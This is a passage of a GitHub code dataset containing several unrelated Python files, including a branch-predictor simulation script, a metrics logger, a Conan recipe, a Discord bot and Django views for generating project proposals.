y.keys():\n benchmark_name = benchmark.split('_')[0].upper()\n graph(benchmark_name + \", Smith\", 'b', \"Misprediction Rate (%)\", x, y[benchmark])\n\n # graph 2: bimodal predictor\n x = [i for i in range(7, 13)]\n \n for key in y.keys():\n y[key] = []\n\n g2_count = 0\n\n for benchmark in y.keys():\n for m in x:\n mispred_rate = subprocess.run(\n [\"./sim\", \"bimodal\", str(m), benchmark, '1'], \n capture_output = True\n ).stdout\n\n mispred_rate = float(mispred_rate)\n y[benchmark].append(mispred_rate)\n\n print(\"(graph 2 - bimodal): m = {}\\t | benchmark = {}\\t | misprediction rate: {}\".format(m, benchmark, mispred_rate))\n g2_count += 1\n \n print('-' * 85)\n\n print(\"GRAPH 2 (bimodal) SIMULATIONS RUN: \", g2_count)\n\n for benchmark in y.keys():\n benchmark_name = benchmark.split('_')[0].upper()\n graph(benchmark_name + \", bimodal\", 'm', \"Misprediction Rate (%)\", x, y[benchmark])\n\n # graph 3: Gshare predictor\n for key in y.keys():\n y[key] = {}\n\n g3_count = 0\n\n for benchmark in y.keys():\n for m in x:\n for n in range(2, m + 1, 2):\n y[benchmark].setdefault(n, [])\n\n mispred_rate = subprocess.run(\n [\"./sim\", \"gshare\", str(m), str(n), benchmark, '1'], \n capture_output 
= True\n ).stdout\n\n mispred_rate = float(mispred_rate)\n y[benchmark][n].append(mispred_rate)\n\n print(\"(graph 3 - gshare): m = {}\\t | n = {}\\t | benchmark = {}\\t | misprediction rate: {}\".format(m, n, benchmark, mispred_rate))\n g3_count += 1\n\n print('-' * 110)\n\n print('-' * 110)\n\n print(\"GRAPH 3 (Gshare) SIMULATIONS RUN: \", g3_count)\n\n for benchmark in y.keys():\n benchmark_name = benchmark.split('_')[0].upper()\n\n for n, vals in y[benchmark].items():\n graph(benchmark_name + \", Gshare\", 'm', \"Misprediction Rate (%)\", x[-len(vals):], vals, n)\n\n plt.savefig(\"graph_logs/{}_gshare.png\".format(benchmark_name))\n plt.clf()\n\n os.system(\"make clean\")","repo_name":"kobeeraveendran/cda5106","sub_path":"hw/MachineProblem2Fall2021/branch_predict/simulation_manager.py","file_name":"simulation_manager.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26759239767","text":"\"\"\"\nUsed for recording data\n\"\"\"\nfrom collections import OrderedDict\nfrom collections.abc import ItemsView\nfrom numbers import Number\nfrom typing import Union, Iterator, Tuple, Mapping, Sequence\n\nimport numpy as np\nimport torch\n\nfrom lumo.utils.fmt import to_ndarray, detach, is_scalar\nfrom lumo.core import PropVar\n\n\nclass Meter(metaclass=PropVar):\n def __init__(self):\n self._rec = {}\n self._avg = {}\n\n def sorted(self) -> 'Meter':\n m = Meter()\n m._rec = self._rec\n m._avg = OrderedDict()\n m._prop = self._prop\n for k in sorted(self._avg.keys()):\n m._avg[k] = self._avg[k]\n return m\n\n def todict(self):\n return self._rec\n\n @property\n def _stage(self):\n return self._prop.get('stage', 'default')\n\n @_stage.setter\n def _stage(self, value):\n self._prop['stage'] = value\n\n def __setattr__(self, key: str, value):\n if key.startswith('_'):\n super(Meter, self).__setattr__(key, value)\n else:\n self[key] = value\n\n def __getattr__(self, item):\n return self[item]\n\n def __getitem__(self, item):\n return self._rec[item]\n\n def __setitem__(self, key, value):\n value = to_ndarray(value)\n\n stg = self._avg.get(key, None)\n isscalar = value.size == 1\n\n if stg is None:\n dtype = value.dtype.name\n\n if self._stage in {'min', 'max'} and not isscalar:\n raise ValueError(\n f'Only support min/max(a) operator on scalar metrics, but got data of shape {value.shape}.')\n elif self._stage in {'min', 'max', 'sum', 'mean', 'smean'} and 'str' in dtype:\n raise ValueError(f'Only support min/max/sum/mean operator on tensor metrics, but got type {dtype}.')\n\n if self._stage == 'default':\n if isscalar:\n if 'int' in dtype:\n self._stage = 'last'\n else:\n self._stage = 'mean'\n else:\n self._stage = 'last'\n\n self._avg[key] = self._stage\n\n if isscalar:\n value = value.item()\n\n self._rec[key] = value\n self._stage = 'default'\n\n def __repr__(self):\n return ' | '.join([f'{k}: {v}' for k, v in self._rec.items()])\n\n def __iter__(self):\n yield from self.keys()\n\n @property\n def sum(self):\n self._stage = 'sum'\n return self\n\n @property\n def mean(self):\n self._stage = 'mean'\n return self\n\n @property\n def last(self):\n self._stage = 'last'\n return self\n\n @property\n def max(self):\n self._stage = 'max'\n return self\n\n @property\n def min(self):\n self._stage = 'min'\n return self\n\n @property\n def smean(self):\n self._stage = 'smean'\n return self\n\n def update(self, dic: Mapping) -> 'Meter':\n for k, v in dic.items():\n self[str(k)] = v\n return self\n\n def 
serialize(self) -> OrderedDict:\n res = OrderedDict()\n for k, v in self.items():\n res[k] = f'{v}'\n return res\n\n def items(self) -> ItemsView:\n return self._rec.items()\n\n def keys(self):\n return self._rec.keys()\n\n @staticmethod\n def from_dict(dic: Mapping):\n m = Meter()\n for k, v in dic.items():\n m[k] = v\n return m\n\n def scalar_items(self) -> Iterator[Tuple[str, Number]]:\n for k, v in self.items():\n nd = to_ndarray(v)\n if is_scalar(nd):\n yield k, nd.item()\n\n\nclass AvgItem:\n SLIDE_WINDOW_SIZE = 100\n EXP_WEIGHT = 0.75\n\n def __init__(self, item, gb_method):\n item_ = detach(item)\n self.gb_method = gb_method # groupby method\n self.acc = [item_]\n self.c = 1\n self.cur = item\n self.last = item_\n self.offset = item_\n self.nd = to_ndarray(item)\n self.isint = 'int' in self.nd.dtype.name\n self.isnumber = (self.isint or 'float' in self.nd.dtype.name) and isinstance(item, (np.ndarray,\n torch.Tensor))\n self.isscalar = self.nd.size == 1\n if not self.isscalar and gb_method in {'min', 'max'}:\n raise AssertionError(f'{gb_method} method only supports scalars')\n\n def __repr__(self):\n \"\"\"\n A simpler but more time-consuming approach would compute the precision with a math expression instead of the if-else branches, e.g.\n prec = max(min(8, int(np.ceil(np.log10((1 / (self.offset + 1e-10)))))), 1)\n fmt_str = f'{{:.{prec}f}}'\n return fmt_str.format(res)\n \"\"\"\n res = self.res\n if self.isscalar:\n res = to_ndarray(res).item()\n if self.isint:\n return f\"{res}\"\n elif self.isnumber:\n # return f'{res:.4f}'\n if self.offset < 1e-8:\n return f'{res:.10f}'\n elif self.offset < 1e-6:\n return f'{res:.8f}'\n elif self.offset < 1e-4:\n return f'{res:.6f}'\n return f'{res:.4f}'\n else:\n return f'{res}'\n else:\n return f'{res}'\n\n __str__ = __repr__\n\n def update(self, item):\n self.cur = item\n item = detach(item)\n\n avg = self.gb_method\n if self.isnumber:\n self.offset = self.offset * AvgItem.EXP_WEIGHT + abs(item - self.last) * (1 - AvgItem.EXP_WEIGHT)\n\n if avg == 'slide':\n self.acc.append(item)\n if len(self.acc) > AvgItem.SLIDE_WINDOW_SIZE:\n self.acc.pop(0)\n self.last = self.cur\n elif avg in {'mean', 'sum'}:\n self.acc[0] = self.acc[0] + item\n self.c += 1\n elif avg == 'max':\n self.last = max(self.cur, self.last)\n elif avg == 'min':\n self.last = min(self.cur, self.last)\n elif avg == 'last':\n self.last = item\n\n @property\n def res(self):\n avg = self.gb_method\n if avg == 'slide':\n return np.mean(self.acc)\n if avg == 'mean':\n return self.acc[0] / self.c\n elif avg == 'sum':\n return self.acc[0]\n elif avg in {'max', 'min', 'last'}:\n return self.last\n return self.cur\n","repo_name":"sailist/emotion-recognition-in-conversation","sub_path":"lumo/core/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10317537390","text":"import psycopg2\nimport os\nimport winshell\nfrom win32com.client import Dispatch\nfrom dotenv.main import load_dotenv\n\ndef connectDataBase():\n\n load_dotenv()\n\n con = psycopg2.connect(\n dbname = \"agendador\",\n user = \"postgres\",\n password = os.environ[\"DATABASE_PASSWORD\"],\n host = \"localhost\"\n )\n\n return con\n\n\ndef createDesktopShortcut():\n local_path = os.getcwd()\n desktop = winshell.desktop()\n shortcutPath = os.path.join(desktop, \"Agendador ePROC.lnk\")\n target = os.path.join(local_path, \"Agendador ePROC.exe\")\n iconPath = os.path.join(local_path, \"img/icon.ico\")\n\n if not 
os.path.exists(shortcutPath):\n shell = Dispatch('WScript.Shell')\n shortcut = shell.CreateShortCut(shortcutPath)\n shortcut.Targetpath = target\n shortcut.WorkingDirectory = local_path\n shortcut.IconLocation = iconPath\n shortcut.save()\n","repo_name":"gianluca-magnabosco/Agendador-ePROC","sub_path":"functions/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18842037032","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 4 13:21:44 2022\r\n\r\n@author: amacemirhan\r\nBanker's algorithm\r\n\"\"\"\r\nimport numpy\r\n\r\navailable = [3,3,2]\r\nallocation = [[0,1,0],[2,0,0],[3,0,2],[2,1,1],[0,0,2]]\r\nMax = [[7,5,3],[3,2,2],[9,0,2],[2,2,2],[4,3,3]]\r\n\r\navailable = numpy.asarray(available)# convert to numpy array\r\nallocation = numpy.asarray(allocation)\r\nMax = numpy.asarray(Max)\r\nNeed = Max-allocation\r\ncompleted = numpy.array([])\r\na=[False,False,False,False,False]\r\niterate=0\r\nwhile(a.count(True)!=5 and iterate<30):\r\n iterate += 1\r\n for i in range(5):\r\n comparison = available >= Need[i]\r\n if a[i]:\r\n continue\r\n elif(comparison.all()):\r\n print(\"P\",str(i),\" \")\r\n available += allocation[i]\r\n a[i]=True\r\nif (a.count(True)==5):\r\n print(\"deadlock olusmadi\")\r\nelse:\r\n print(\"deadlock olustu. P\",(a.index(False)),\" icin gerekenler \",str(Need[a.index(False)]-available))\r\n ","repo_name":"amacemirhan/Python-Workshops","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71544735288","text":"import RPi.GPIO as GPIO\nimport picamera\nimport time\n \nGPIO.setmode(GPIO.BCM)\nGPIO.setup(24, GPIO.IN)\n#uses pin 24\n\ncounter = 0\nid = 1 #which Pi is this?\ncamera = picamera.PiCamera()\n\ncamera.resolution = (1920, 1080)\ncamera.start_preview()\n# Camera warm-up time\ntime.sleep(2)\n\nwhile True:\n if ( GPIO.input(24) == False ):\n camera.capture('/media/Uploaded_Pictures/cam_' + str(id) + '_' + str(counter) + '.jpg')\n counter = counter + 1","repo_name":"elendiastarman/jaw-tracking","sub_path":"takePics.py","file_name":"takePics.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31960354765","text":"from conan import ConanFile\nfrom conan.tools.files import get, copy, replace_in_file\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\n\nimport os\n\nrequired_conan_version = \">=1.53.0\"\n\nclass PlutoVGConan(ConanFile):\n name = \"plutovg\"\n description = \"Tiny 2D vector graphics library in C\"\n license = \"MIT\",\n topics = (\"vector\", \"graphics\", )\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/sammycage/plutovg\"\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n self.settings.rm_safe(\"compiler.libcxx\")\n self.settings.rm_safe(\"compiler.cppstd\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def source(self):\n 
get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS\"] = True\n tc.generate()\n\n def build(self):\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"),\n \"add_library(plutovg STATIC)\", \"add_library(plutovg)\")\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"),\n \"add_subdirectory(example)\", \"\")\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, pattern=\"LICENSE\", dst=os.path.join(self.package_folder, \"licenses\"), src=self.source_folder)\n copy(self, pattern=\"*.h\", dst=os.path.join(self.package_folder, \"include\"), src=os.path.join(self.source_folder, \"include\"))\n copy(self, pattern=\"*.a\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.so\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.lib\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.dll\", dst=os.path.join(self.package_folder, \"bin\"), src=self.build_folder, keep_path=False)\n copy(self, pattern=\"*.dylib\", dst=os.path.join(self.package_folder, \"lib\"), src=self.build_folder, keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = [\"plutovg\"]\n if self.settings.os in (\"FreeBSD\", \"Linux\"):\n self.cpp_info.system_libs = [\"m\"]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/plutovg/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"34253587833","text":"from __future__ import print_function, unicode_literals\nfrom pprint import pprint\nfrom PyInquirer import prompt, Separator\nfrom tvdb_api import BaseUI\n\nclass CustomUI(BaseUI):\n\n def selectSeries(self, allSeries,limit=6):\n \n # print(allSeries)\n seriesList = [{\n 'type' : 'list',\n 'name' : 'seriesName',\n 'message' : 'Select Your Tv Series',\n }]\n\n choices = []\n\n for i,show in enumerate(allSeries):\n choices.append({\n 'name': show['seriesName'],\n 'value': i+1\n })\n\n seriesList[0]['choices'] = choices\n\n answers = prompt(seriesList)\n\n return allSeries[answers['seriesName']-1]","repo_name":"atulya2109/tv-renamer","sub_path":"src/tv/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42730759634","text":"ORDERINGS = [\n 'Home',# anteatery main dish\n 'Oven',# anteatery pizza\n 'Fire And Ice Round Grill',# anteatery main dish 2\n 'Grubb / Mainline',# brandywine main dish\n 'Compass',# brandywine main dish 2\n 'Hearth/Pizza',# brandywine pizza\n 'Deli',# anteatery sandwiches\n 'The Farm Stand / Deli',\n 'Crossroads',# brandywine 3rd entree\n 'Sizzle Grill',# anteatery burgers\n 'Ember/Grill',# brandywine burgers\n 'Vegan',# both vegan\n 'Bakery',# anteatery dessert\n 'Honeycakes/Bakery',# brandywine dessert\n 'Soups',# both soup\n \"Farmer's Market\",# anteatery salad\n 'The Farm Stand / Salad Bar'# brandywine salad\n]\n\ndef station_ordering_key(station_name: str) -> int:\n '''\n Returns an integer used to sort station names by relevance (basically Eric's personal preferences 😋)\n '''\n try:\n return ORDERINGS.index(station_name)\n 
except ValueError: # station name not in ORDERINGS; sort unknown stations ahead of known ones\n print(f\"ValueError (NON-BREAKING) on station orderings. Key {station_name} is not in list\")\n return -1","repo_name":"EricPedley/zotmeal-backend","sub_path":"api/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8092907436","text":"import gspread\nimport pandas as pd\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom gspread_dataframe import set_with_dataframe\n\nscope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\ncreds = ServiceAccountCredentials.from_json_keyfile_name('credentials.json',\n scope)\nclient = gspread.authorize(creds)\nwotvspreadsheet = client.open('Ildyra Bot')\nramadaspreadsheet = client.open('Ramada Bot')\n\n\nclass DfHandlerWotv():\n \"\"\"Object to handle WOTV sheets related operations.\"\"\"\n def __init__(self):\n \"\"\"Object initialisation.\"\"\"\n # Dictionary to save various IDs.\n self.ids = {\n 'WOTV Events': [],\n 'FFBE Server': [],\n 'WOTV Newsfeed': [],\n 'WOTV Sync': [],\n }\n # Initial synchronisations.\n self.sync()\n self.sync_events()\n\n def sync(self):\n \"\"\"To construct or refresh tables from Google sheets.\"\"\"\n # Equipment data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_eq').get_all_records())\n self.eq = df.set_index('EQ Name')\n # Trust master data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_tm').get_all_records())\n self.tm = df.set_index('Unit Name')\n # Vision card data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_vc').get_all_records())\n self.vc = df.set_index('VC Name')\n # Esper data.\n df = pd.DataFrame(\n wotvspreadsheet.worksheet('WOTV_esper').get_all_records())\n self.esper = df.set_index('Esper')\n # Material name table.\n df = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_matname').get_all_records())\n self.mat = df.set_index('Material')\n # Shortcut table.\n df = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_shortcut').get_all_records())\n self.shortcut = df[df['Type'] == 'shortcut']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.replace = df[df['Type'] == 'replace']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.eq_type = df[df['Type'] == 'eq_type']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.w_type = df[df['Type'] == 'w_type']\\\n .drop('Type', axis=1).set_index('Shortcut')\n self.removal = df[df['Type'] == 'removal']\\\n .drop('Type', axis=1).set_index('Shortcut')\n # Text table.\n self.text = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_text').get_all_records())\n # Fluff tables.\n self.stars = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_stars').get_all_records())\n self.rand = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_rand').get_all_records())\n # Import various ids.\n df_ids = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_ids').get_all_records())\n for k in self.ids.keys():\n self.ids[k] = df_ids[df_ids['Type'] == k]['ID'].tolist()\n\n def sync_events(self):\n \"\"\"Event data.\n Separated because it is updated more frequently.\n \"\"\"\n # Event data.\n self.events = pd.DataFrame(\n ramadaspreadsheet.worksheet('WOTV_events').get_all_records())\n\n def add_event(self, event):\n \"\"\"Used for when adding events via discord command.\"\"\"\n ramadaspreadsheet.worksheet('WOTV_events').append_row(event)\n self.sync_events()\n\n\nclass DfHandlerGen():\n \"\"\"Object handling general sheets related 
operations.\"\"\"\n def __init__(self):\n \"\"\"Object initialisation.\"\"\"\n # Initial synchronisation.\n self.sync()\n\n def sync(self):\n \"\"\"\"To construct or refresh tables from Google sheets.\"\"\"\n # Sheet for personal shortcuts.\n self.shortcuts = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_shortcuts').get_all_records())\n # Sheet for tags.\n self.tags = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_tags').get_all_records()\n )\n self.tags[\"Tag\"] = self.tags[\"Tag\"].astype(str)\n self.tags_last = len(self.tags) + 1\n # Sheet for ids.\n self.ids = pd.DataFrame(\n ramadaspreadsheet.worksheet('my_ids').get_all_records())\n self.ids['ID'] = self.ids['ID'].astype('int64')\n\n def add_shortcut(self, *arg):\n \"\"\"Used for when adding shortcuts via discord command.\"\"\"\n ramadaspreadsheet.worksheet('my_shortcuts').append_row(list(arg))\n self.sync()\n\n def sync_tags(self, clean=False):\n \"\"\"Sync local Data to Google sheets.\"\"\"\n df = self.tags.copy()\n df['User'] = df['User'].apply(str)\n try:\n if clean:\n ramadaspreadsheet.values_clear(f\"my_tags!A2:E{self.tags_last}\")\n self.tags_last = len(self.tags) + 1\n set_with_dataframe(\n ramadaspreadsheet.worksheet('my_tags'),\n df,\n include_index=False\n )\n return 1\n except gspread.exceptions.APIError as e:\n return e\n","repo_name":"shaunyongfc/gsheet_bot","sub_path":"gsheet_handler.py","file_name":"gsheet_handler.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10731708553","text":"import discord\nimport yaml\nimport brut\n\n\n###Load config\ntry:\n with open('conf.yaml') as file:\n conf = yaml.safe_load(file)\nexcept Exception as e:\n print(e)\n exit()\n\ntry:\n token = conf['credentials']['token']\nexcept Exception as e:\n print(e)\n exit()\n\nbruv_list = [\n'bruv',\n'brut',\n'brunt',\n'bruck',\n'bruc',\n'bruk',\n'brub',\n'brug',\n'bruh',\n'bruy',\n'bruf',\n'bruph',\n'brud',\n'brun',\n'brum',\n'brup'\n]\n\n\n\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n\n #Brut Scores\n\n if message.content.lower() == '!globalbrutscore':\n await brut.GetTopBrutHighScores(message)\n return\n \n if message.content.lower() == '!channelbrutscore':\n await brut.GetChannelBrutHighScores(message)\n return\n \n if message.content.lower() == '!serverbrutscore':\n await brut.GetServerBrutHighScores(message)\n return\n \n if message.content.lower() == '!mybrutscore':\n await brut.GetUserBrutScore(message)\n return\n\n #Check for brutlist match\n for bruv in bruv_list:\n if bruv in message.content.lower():\n #check for a close match, maybe some punctuation at the end\n if len(message.content) <= (len(bruv) +4 ):\n matched_string = bruv\n else: \n matched_string = 'miss'\n #Send message and log\n await brut.Brut(message, matched_string)\n return\n\n\n\n\nclient.run(token)","repo_name":"Xidium/brot","sub_path":"brot.py","file_name":"brot.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13472643814","text":"from django.shortcuts import get_object_or_404, get_list_or_404\nfrom django.views.generic import RedirectView, View\nfrom django.http import JsonResponse\nfrom django.views.generic.base import ContextMixin, TemplateResponseMixin\n\nimport 
proposal.models\nimport proposal.serializers\nfrom resthelper.views import FormModelViewSet \nfrom reorderhelper.views import ReorderMixin\nfrom proposal.jinjaHandler import JinjaHandler, PropgenTemplateException\n\n# automatically generate the main ModelViewSets\n\nimport pypandoc\nimport pathlib\n\nimport os\nimport shutil\nimport tarfile\nimport re\nimport subprocess\n\n\nclass SomeModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.SomeModelSerializers\n model_class = proposal.models.SomeModel\n list_template = \"SomeModelTemplate.html\"\n detail_template = \"SomeModel_DetailTemplate.html\"\n form_template = \"SomeModel_FormTemplate.html\"\n\nclass PartnertypeModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.PartnertypeSerializer\n model_class = proposal.models.Partnertype\n\n\nclass PartnerModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.PartnerSerializer\n model_class = proposal.models.Partner\n\n\nclass WorkpackageModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.WorkpackageSerializer\n model_class = proposal.models.Workpackage\n\n\nclass TaskModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TaskSerializer\n model_class = proposal.models.Task\n\n\nclass DeliverableModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.DeliverableSerializer\n model_class = proposal.models.Deliverable\n\n\nclass MilestoneModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.MilestoneSerializer\n model_class = proposal.models.Milestone\n\nclass ProjectModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.ProjectSerialier\n model_class = proposal.models.Project\n\n\nclass ProducableTypesModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.ProducableTypesSerializer\n model_class = proposal.models.ProducableTypes\n\nclass DisseminationTypesModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.DisseminationTypesSerializer\n model_class = proposal.models.DisseminationTypes\n\n\n# not sure about these;\n# probably better incorporated into the various Task/deliverable/Milestone\n# views and templates? 
\n\nclass TaskPartnerPMModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TaskPartnerPMSerializer\n model_class = proposal.models.TaskPartnerPM\n\n\nclass DeliverablePartnerPMModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.DeliverablePartnerPMSerializer\n model_class = proposal.models.DeliverablePartnerTaskPM\n\n\nclass MilestonePartnerPMModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.MilestonePartnerPMSerializer\n model_class = proposal.models.MilestonePartnerTaskPM\n \nclass SettingsModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.SettingsSerializer\n model_class = proposal.models.Setting\n\n # def get_renderer_context(self):\n # context = super().get_renderer_context()\n # context['bla'] = \"ksjdfksdhf\"\n # # print(\"setting view context: \", context)\n # return context\n #\n # def get_serializer_context(self):\n # context = super().get_serializer_context()\n # # groups = proposal.models.Setting.values('group').distinct()\n # # context['names'] = []\n # # for g in groups:\n # # tmp = proposal.models.Setting.objects.filter(group=g)\n # # context['names'].append((g, tmp,))\n # context['viewcontext'] = \"aha!\"\n # return context\n\nclass TemplateModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TemplateSerializer\n model_class = proposal.models.Template\n\nclass TextblockModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.TextblockSerializer\n model_class = proposal.models.Textblock\n\nclass BibliographyModelViewSet(FormModelViewSet, ReorderMixin):\n serializer_class = proposal.serializers.BibliographySerializer\n model_class = proposal.models.Bibliography\n\n\n##########################################\n# Serious views below\n\nclass ExecutionView(TemplateResponseMixin, ContextMixin, View):\n\n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n response_kwargs = {'content_type': request.content_type}\n data = self.entrypoint(**kwargs)\n if request.content_type == 'application/json' or \\\n ('HTTP_ACCEPT' in request.META and 'application/json' in request.META['HTTP_ACCEPT']):\n return JsonResponse(data)\n context.update(data)\n return self.response_class(\n request=request,\n template=self.get_template_names(),\n context=context,\n using=self.template_engine,\n **response_kwargs\n )\n\n def entrypoint(self, **kwargs):\n pass\n\n\nclass ExecuteTemplates(ExecutionView):\n template_name = \"execute_template.html\"\n\n def get_settings(self):\n self.template_dir = proposal.models.Setting.get_default('dirs', 'templates')\n self.latex_dir = proposal.models.Setting.get_default('dirs', 'latex')\n\n\n def export_bibliographies(self):\n r = []\n for bib in proposal.models.Bibliography.objects.filter(filename__endswith=\".bib\"):\n \"\"\"TODO: so far, only handle bibtex files\"\"\"\n with open(os.path.join(self.latex_dir, bib.filename), 'w') as fp:\n fp.write(bib.bibliography)\n r.append({'obj': {'id': bib.id, 'name': bib.name}, 'result': \"written to disk\"})\n return r\n\n def execute_template(self, template, jh, dir=\"\"):\n # print(\"running: {}\".format(template.name))\n try:\n output = jh.render(template)\n msg = \"ok\"\n except PropgenTemplateException as e:\n output = \"ERROR occured: \" + e.message\n msg = e.message\n finally:\n with open(os.path.join(\n dir,\n template.name), 'w') as fp:\n fp.write(output)\n\n return msg\n\n\n 
def export_textblocks(self):\n \"\"\"Look at all textblocks, produce md files if requested\"\"\"\n r = []\n\n for tb in proposal.models.Textblock.objects.exclude(filename__isnull=True):\n # print(\"textblock production: \", tb)\n\n filename = tb.filename\n if filename[-3:] == \".md\":\n outdir = self.template_dir\n elif filename[-4:] == \".tex\":\n outdir = self.latex_dir\n else:\n filename += \".md\"\n outdir = self.template_dir\n\n with open(os.path.join(outdir,\n filename),\n 'w') as fp:\n fp.write(tb.textblock)\n\n r.append({'obj': {'id': tb.id, 'name': tb.name}, 'result': \"written to disk\"})\n\n return r\n\n def entrypoint(self, **kwargs):\n # print (kwargs)\n r = {'results': []}\n\n self.get_settings()\n\n # ensure that directory exists\n os.makedirs(self.template_dir, mode=0o700, exist_ok=True)\n\n if 'pk' in kwargs:\n try:\n pk = int(kwargs.pop('pk'))\n template = proposal.models.Template.objects.get(pk=int(pk))\n templatelist = [template]\n except:\n from django.core.exceptions import ObjectDoesNotExist\n raise ObjectDoesNotExist\n else:\n templatelist = proposal.models.Template.objects.all()\n\n\n ############\n r['tbresults'] = self.export_textblocks()\n r['bibresults'] = self.export_bibliographies()\n\n ############\n jh = JinjaHandler()\n\n for t in templatelist:\n outdir = self.latex_dir if t.name[-4:] == \".tex\" else self.template_dir\n # print(\"template: \", t, outdir)\n tmp = self.execute_template(\n t, jh, dir=outdir)\n\n r['results'].append({'obj': {'id': t.id, 'name': t.name}, 'result': tmp})\n\n ###############\n\n return r\n\n\nclass CreateLatex(ExecutionView):\n\n template_name = \"create_latex.html\"\n\n def get_settings(self):\n self.template_dir = proposal.models.Setting.get_default('dirs', 'templates')\n self.latex_dir = proposal.models.Setting.get_default('dirs', 'latex')\n self.filters = proposal.models.Setting.get_default('pandoc', 'filters')\n self.extra_args = proposal.models.Setting.get_default('pandoc', 'extra_args')\n\n def run_pandoc(self):\n r = {}\n\n # ensure latexdir exists:\n os.makedirs(self.latex_dir, mode=0o700, exist_ok=True)\n\n # iterate over all md files in templates; run them through pandoc\n p = pathlib.Path(self.template_dir)\n for t in list(p.glob('*.md')):\n # print(\"----------------------------\")\n # print(t)\n r[t.name] = \"ok\"\n\n try:\n\n latex = pypandoc.convert_file(\n t.as_posix(),\n 'latex',\n 